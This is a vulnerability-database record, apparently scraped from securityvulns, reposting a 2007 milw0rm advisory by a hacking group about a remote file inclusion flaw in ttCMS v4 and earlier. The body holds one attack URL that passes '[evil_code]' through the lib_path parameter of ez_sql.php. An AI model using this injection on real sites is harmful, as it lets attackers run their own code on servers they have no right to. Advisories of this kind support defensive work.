ttCMS <= v4 (ez_sql.php lib_path) Remote File Inclusion Vulnerability

2007-03-25T00:00:00

Description

DEVIL TEAM - HACKING POLISH TEAM Author: Kacper (a.k.a Rahim) Contact: kacper1964@yahoo.pl Homepage: http://www.rahim.webd.pl/ Irc: irc.milw0rm.com:6667 #devilteam -------------------------------------------- Pozdro dla wszystkich z kanalu IRC oraz forum DEVIL TEAM. ttCMS <= v4 (ez_sql.php lib_path) RFI Vulnerability script download/homepage: http://www.ttcms.com/v4/ -------------------------------------------- Vulnerabilities: http://site.com/ttCMS_path/lib/db/ez_sql.php?lib_path=[evil_code] # milw0rm.com [2007-03-24]

{"id": "SECURITYVULNS:DOC:16474", "bulletinFamily": "software", "title": "ttCMS <= v4 (ez_sql.php lib_path) Remote File Inclusion Vulnerability", "description": "DEVIL TEAM - HACKING POLISH TEAM\r\n\r\nAuthor: Kacper (a.k.a Rahim)\r\nContact: kacper1964@yahoo.pl\r\nHomepage: http://www.rahim.webd.pl/\r\nIrc: irc.milw0rm.com:6667 #devilteam \r\n--------------------------------------------\r\nPozdro dla wszystkich z kanalu IRC oraz forum DEVIL TEAM.\r\n\r\n\r\n\r\nttCMS <= v4 (ez_sql.php lib_path) RFI Vulnerability\r\nscript download/homepage: http://www.ttcms.com/v4/\r\n\r\n\r\n--------------------------------------------\r\nVulnerabilities:\r\n\r\nhttp://site.com/ttCMS_path/lib/db/ez_sql.php?lib_path=[evil_code]\r\n\r\n# milw0rm.com [2007-03-24]\r\n", "published": "2007-03-25T00:00:00", "modified": "2007-03-25T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16474", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:21", "edition": 1, "viewCount": 91, "enchantments": {"score": {"value": 1.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7465"]}], "rev": 4}, "backreferences": {}, "exploitation": null, "vulnersScore": 1.4}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645436622}}

ttCMS &lt;= v4 &#40;ez_sql.php lib_path&#41; Remote File Inclusion Vulnerability

Description

ttCMS <= v4 (ez_sql.php lib_path) Remote File Inclusion Vulnerability